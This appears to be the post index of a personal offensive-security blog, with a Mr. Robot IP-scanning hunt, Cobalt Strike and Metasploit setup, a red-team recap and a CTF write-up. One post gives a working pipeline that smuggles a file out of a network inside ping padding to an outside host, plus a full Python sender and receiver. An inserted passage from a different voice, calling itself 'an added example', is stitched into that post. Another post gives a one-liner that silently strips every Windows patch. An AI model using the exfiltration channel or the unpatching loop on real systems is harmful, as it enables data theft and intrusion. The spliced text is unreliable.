Posts

  1. Mr. Robot Season 2 Episode 4 Easter Egg


    After seeing the last Mr. Robot easter egg from season 2 episode 1, I have been on the lookout for IPs and domains to go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.253.

    I decided to scan that host with nmap and got the following results:

    → sudo nmap -sS -Pn -sV -n 192.251.68.253
    Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
    Nmap scan report for 192.251.68.253
    Host is up (0.023s latency).
    Not shown: 996 filtered ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp?
    80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
    554/tcp  open  rtsp?
    7070/tcp open  realserver?
    Service Info: Device: load balancer
    

    HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net.

    After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

    After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the role of Darlene and entered what she said in the show.

    Here is the response I got:

    they have changed their standard issue. we have a way in.

    What does that even mean? At the end of the episode this line of dialogue was not shown; only "wait for my instructions" was. The scene after shows a news article from Business Insider titled FBI gives up Blackberry for Android. I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move; we'll see how it plays out next week.

    After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

  2. Metasploit Workflows and Scripting


    Here is a presentation I gave at GVSU on 7/20/16 about the basics of Metasploit and automation using pymetasploit.

    The code for autopsexec is not public right now because it is a mess. I'll update this post when I fix it!

  3. Data Exfiltration with Ping


    I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it: exfiltrating data from a network inside the padding of ICMP echo request packets, using nothing but ping.

    Sending data

    # 16 bytes of pattern per ping (the most -p accepts); -s32 gives a 32-byte payload
    base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done
    

    This base64-encodes important-data.txt, turns the encoded text into hex 16 bytes at a time (16 bytes is the most `ping -p` will accept as a pattern), and sends each chunk as the padding of a single echo request. ping repeats the pattern to fill the 32-byte payload, so each packet carries the chunk more than once.

    Obviously you should change 8.8.8.8 to a host you control before sending :)

    Receiving data

    You can grab the data off the wire using scapy. Here's a short script that takes an output file name as the first argument and an optional interface name to listen on as the second argument.
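    The following is an added example, not the post's scapy script: it models the whole channel offline so the receiver logic can be checked without root or a live interface. Both sides are written with the Python standard library only. Its assumptions are not stated on the page: packets are modelled as the bytes Linux iputils ping emits for `ping -c1 -s32 -p <hex>`, where the 32-byte payload is the pattern repeated and a 16-byte timestamp is written over the first 16 bytes (which is why the receiver reads the second copy, payload[16:32], and why -s32 rather than -s16 matters). The sender side also pads the base64 text to a multiple of 16 bytes, which the shell pipeline does not; ping fills a short final pattern cyclically, so without padding the receiver could not tell where the data ends. Names like `sender_chunks`, `build_echo_request` and the sample secret are mine.

```python
import base64
import socket
import struct

PATTERN_LEN = 16   # `ping -p` accepts at most 16 pattern bytes, hence `xxd -c 16`
PAYLOAD_LEN = 32   # `ping -s32`
TS_LEN = 16        # assumption: iputils stamps a 16-byte timeval over payload[0:16]


def sender_chunks(data: bytes) -> list:
    """What `base64 file | xxd -ps -c 16` feeds to `ping -p`: hex strings of 16 bytes.

    Deviation from the shell pipeline: the base64 text is padded with newlines
    (ignored by base64 decoders) to a multiple of 16 bytes, because ping repeats
    a shorter pattern cyclically to fill the payload and the receiver could not
    tell where the real data ends.
    """
    text = base64.encodebytes(data)          # 76-column wrapping, like coreutils
    rem = len(text) % PATTERN_LEN
    if rem:
        text += b"\n" * (PATTERN_LEN - rem)
    return [text[i:i + PATTERN_LEN].hex() for i in range(0, len(text), PATTERN_LEN)]


def icmp_checksum(msg: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words."""
    if len(msg) % 2:
        msg += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(msg) // 2), msg))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return ~total & 0xFFFF


def build_echo_request(pattern_hex: str, seq: int = 1, src: str = "10.0.0.5",
                       dst: str = "8.8.8.8", ident: int = 0x1234,
                       timestamp: bytes = b"\x00" * TS_LEN) -> bytes:
    """Constructed IPv4+ICMP echo request modelling `ping -c1 -s32 -p <hex>`.

    The IP header checksum is left zero; this is a test vector for the
    receiver, not a packet meant to go on the wire.
    """
    pat = bytes.fromhex(pattern_hex)
    payload = bytearray((pat * (PAYLOAD_LEN // len(pat) + 1))[:PAYLOAD_LEN])
    payload[:TS_LEN] = timestamp             # first copy of the pattern is clobbered
    icmp = bytearray(struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload)
    icmp[2:4] = struct.pack("!H", icmp_checksum(bytes(icmp)))
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    return ip_hdr + bytes(icmp)


def extract_pattern(packet: bytes):
    """Receiver side for one raw IPv4 frame (what a sniffer hands you).

    Returns the 16 pattern bytes carried by an ICMP echo request with a
    32-byte payload, or None for anything else. Only the second copy of the
    pattern (payload[16:32]) is read, because the first holds the timestamp.
    """
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != 1:
        return None                          # not IPv4 / not ICMP
    ihl = (packet[0] & 0x0F) * 4
    icmp = packet[ihl:]
    if len(icmp) != 8 + PAYLOAD_LEN or icmp[0] != 8:
        return None                          # not an echo request from ping -s32
    if icmp_checksum(icmp) != 0:
        return None                          # corrupted in transit
    return icmp[8 + TS_LEN:]


def reassemble(packets) -> bytes:
    """Concatenate recovered chunks in arrival order and base64-decode them.

    Each `ping -c1` starts its own sequence counter at 1, so the channel has
    no ordering information of its own; it relies on in-order delivery.
    """
    text = b"".join(c for c in map(extract_pattern, packets) if c is not None)
    return base64.b64decode(text)            # stray newlines are discarded


if __name__ == "__main__":
    secret = b"constructed sample: db password is hunter2\n"   # constructed input
    frames = [build_echo_request(h) for h in sender_chunks(secret)]
    print(len(frames), "pings carry", len(secret), "bytes")
    print(reassemble(frames))
```

    To use `extract_pattern` live, feed it the IP-layer bytes of each sniffed packet (with scapy that is `bytes(pkt[IP])` from a `sniff(filter="icmp")` callback) and append whatever it returns to the output file; the checksum check drops damaged frames, but nothing here detects a lost or reordered ping, so verify the decoded file against a hash sent the same way.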

    That's all for now.

  4. Hello World


    Finally finished this new blog. It's all static now so that's good.

    I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!

  5. iPhone: Installing apt without a gui


    Usually to get apt you need to launch Cydia. If you only have an ssh connection in and would like apt, you can go to http://apt.saurik.com/debs/ and grab berkeleydb_4.6.21-5_iphoneos-arm.deb and apt7_0.7.25.3-8_iphoneos-arm.deb. Scp them over and install both in one dpkg call so the dependency between them is resolved: dpkg -i berkeleydb_4.6.21-5_iphoneos-arm.deb apt7_0.7.25.3-8_iphoneos-arm.deb. There you go. You can apt-get all of the things now.

  6. Uninstall all installed windows KB patches in one line of batch


    I was trying to unpatch something to make it vulnerable and I was getting impatient trying to uninstall the correct patch, so I got creative and came up with a one-liner to uninstall all of them at once. Or at least all of the ones with working uninstallers that don't have other dependencies... The uninstallers are all called spuninst.exe and are somewhere under \WINDOWS (in a bunch of hidden sub folders that start with $NtUninstall, hence the /A on dir), so I give you the following command, typed at a cmd prompt (inside a .bat file double the percent signs, %%a):

    for /F "delims=" %a in ('dir /B /S /A \WINDOWS ^| findstr spuninst.exe ^| findstr NtUninstall') do @(echo %a && "%a" /quiet /norestart)
    

    Keep running this until it does not print anything (patches that depend on another one fail until that one is gone) and then all of the patches will be gone on reboot. Happy unpatching

    ... bonus

    for /L %b in (0,0,1) do @for /F "delims=" %a in ('dir /B /S /A \WINDOWS ^| findstr spuninst.exe ^| findstr NtUninstall') do @(echo %a && "%a" /quiet /norestart)
    

    That one loops forever (the /L step is 0), so just leave it running until the screen stops printing and then Ctrl-C out.

  7. Cobalt Strike 2.4 on Kali 2.0


    Cobalt Strike 3.0 came out lacking Metasploit integration. Also, Cobalt Strike 2.4 (grab that if you still need it) doesn't work with the version of Metasploit that is built into Kali 2.0. That's okay, because you can still compile a Metasploit framework that works with Cobalt Strike 2.4 alongside the stock one. Everything below is run as root:

    curl -sSL https://get.rvm.io | bash -s stable
    source /usr/local/rvm/scripts/rvm
    apt-get install libpq-dev libpcap-dev
    service postgresql start
    msfconsole
    exit   # this was to make sure the msf database was created
    rvm install 1.9.3
    cd /usr/share
    git clone https://github.com/rapid7/metasploit-framework cs-msf
    cd cs-msf
    git checkout dc48987
    rvm use 1.9.3
    bundle install
    for i in msf*;do update-alternatives --install /usr/bin/$i $i $PWD/$i 1;done
    cd ../metasploit-framework
    for i in msf*;do update-alternatives --install /usr/bin/$i $i $PWD/$i 2;done
    rm -rf $(dirname $(which msfconsole))/msf*
    update-alternatives --config msfrpcd < <(echo 1)
    cp /usr/share/metasploit-framework/config/database.yml /usr/share/cs-msf/config
    export MSF_DATABASE_CONFIG=/usr/share/cs-msf/config/database.yml
    

    Then, edit the database.yml file at /usr/share/cs-msf/config/database.yml:

    • Delete the &pgsql anchor after development
    • Delete all profiles after development (everything from the first empty line on)
    • Change development to production (1st line)
    • Save the file

    You should now be able to run Cobalt Strike 2.4 just fine.

    To switch back just open a new terminal OR:

    update-alternatives --config msfrpcd < <(echo 0)
    rvm use system
    

    And the next time you want to use 2.4 (put this in a script):

    #!/bin/bash
    source /usr/local/rvm/scripts/rvm
    rvm use 1.9.3
    update-alternatives --config msfrpcd < <(echo 1)
    export MSF_DATABASE_CONFIG=/usr/share/cs-msf/config/database.yml
    ./cobaltstrike &>/dev/null & disown
    read -p "Press enter once the RPC server has started up..." i
    update-alternatives --config msfrpcd < <(echo 0)
    

    I'm pretty sure there is a more elegant way to do this rather than using update-alternatives... but this works for now. As a side note... tracking down the exact revision where ruby 2.1 became a dependency was terrible. Yes, this is the absolute LAST commit you can get and compile without ruby 2.1. I might update this with a solution for later versions of metasploit before the MsgPack library update (which breaks cobaltstrike much more than I'm willing to fix!).

  8. WMCSC Red vs. Blue Competition 2015


    Today I had the pleasure of participating in the West Michigan CyberSecurity Consortium's (WMCSC's) annual red vs. blue competition. In April I received an email from one of my professors about red teaming for this event and was interested because I like red teaming. I thought the experience would be worth the money I had made at my internship, so I decided to come out here to play. I was certainly right about it being worth it; I have done a bit of red teaming before, but this was the first time I was doing something without any knowledge of the infrastructure. The team that was gathered was mostly centered in Michigan, with a few people from other areas like myself. We started collaborating in mid July so that we could form a game plan. There were 11 people total on our red team, led by Mr. Matt Carpenter of Grimm. We spent a week or so talking about strategies and tools and then were given access one week before the actual event to try and breach systems and put backdoors in place. This infrastructure was broken up into a few different parts: the school, the power plant, Alphaville, (one other one I can't remember right now), and our target Zenda. Zenda was supposedly a research company we were supposed to hack as the Kneebonian Mafia. The infrastructure for the competition was put together by Merit, a company that was developing networking technologies back when ARPANET was starting to be more heavily used and other networks were popping up. The company now (among other things) runs the Michigan Cyber Range, which was the infrastructure we were playing on.

    To gain access to the environment we had to log onto Windows 7 machines via the VMWare Horizon View client, which connected to the Kali VMs via a remote service called NoMachine. Getting in was actually surprisingly easy, but I locked myself out a few times with a couple of dumb mistakes (I'll explain this in a second). The one disappointing aspect of this competition was that there was no internet within the environment, so we couldn't just go out and get tools and things without a bit of hassle. We ended up being able to upload packages to a web interface and access them from Kali, but this wasn't fully set up until Saturday or Sunday. We gained access to Kali on Thursday, but I didn't really end up doing much until I was able to get my toolset onto the box. They did not give us any IP address information, so I just tried scanning and poking at everything and eventually I ended up locking myself out twice, like I mentioned above. This is how I found out that I do stupid things when I'm not given targets!

    When I scanned and saw the exposed outside (local) network I was a bit disappointed: it was Windows XP, Server 2003, and a lot of Linux 2.X. I thought that was it; we were going to own everything and make blue team cry, and be done in 20 minutes... but I was so wrong. Not long after scans had finished I quickly gained access to five or six Windows XP/2003 machines on that outside local network which was known as Alphaville (the 10.0.3.0/24 network). Our Kali boxes were also on this network. This was Monday, so I spent the day planting myself deep into these boxes with Cobalt Strike's beacons and other shenanigans I like to do to maintain access. One of the boxes was a Server 2003 domain controller for the school network (192.168.40.0/24), which had many hosts underneath it. Unfortunately I was having trouble getting to them, so I moved on and attempted to crack passwords for a bit. I ended up importing ophcrack's XP free small tables into the environment and trying to use those. Since Cobalt Strike and metasploit were already hogging most of my RAM I ended up using OCR to get the hashes on my local box and cracked them using the XP special tables. Through credential re-use I gained access to the Linux machine that the library website was hosted on and planted backdoors on that.

    ...


    Check out the full post for more details!
  9. PoliCTF 2015 – John Pastry Shop – Pwnable 100 (aka how to make a pwndcake)


    This challenge was a pain in the ass, but it was still fun. It's funny that I really don't like Java but I ended up solving the two Java-based challenges in this CTF. Bleh. So this challenge had a set of files and a server to connect to. The files were Cake.java, Decode.java, and ShamanoCakeContainerEncoded.jar. The server was pastry.polictf.it on port 80. The description was:

    Among his hobbies, John likes baking cakes to eat during the warm afternoons in Milan. He is damn good at this such that, a couple of months ago, he decided to open a pastry shop on his own. The shop was an immediate success and John needed to bake just so many cakes that he decided to outsource the production of his famous NewYorkCheeseCake to another external and trusted pastry shop, the Shamano's (see shamanoPastryShop.pem). John provided Shamano's with the original basic recipe of his Cake (see Cake.java) and, after his customization, Shamano returns to John a cake container holding the NewYorkCheeseCake (see ShamanoCakeContainerEncoded.jar). Notice that Shamano has to follow John's directions carefully and that is why he always has to encode properly his cake containers so that John can verify all of them according to a fixed decoding process (see extract of source code in Decode.java). John always tries his best for verifying the quality and genuineness of the incoming NewYorkCheeseCake but, you know, to busy people, like he is, it may sometimes happen to forget to check something.

    So there is a Cake, a NewYorkCheeseCake, and a Decoder; those must be the three files. First, I wanted to see what the server would do upon sending it the ShamanoCakeContainerEncoded.jar file.

    nc pastry.polictf.it 80 < ShamanoCakeContainerEncoded.jar
    Welcome to John's Pastry Shop!
    In John's opinion this cake container seems a trusted one from Shamano's Pastry Shop.
    And it also contains a valid NewYorkCheeseCake.
    This seems a tasty cake!
    Here are its ingredients:
    * Cream Cheese
    * Biscuits
    * Sugar
    * Isinglass
    Thanks for visiting John's Pastry Shop!
    

    Since it said something about encoding I wanted to make sure it was a jarfile.

    file ShamanoCakeContainerEncoded.jar
    ShamanoCakeContainerEncoded.jar: data
    

    Alright, so it's encoded like it says: if it were a plain jar, file would report a Zip archive, since jars are just zips. Good thing there is a Decoder! ... well, most of a decoder: ...


    Check out the full post for more details!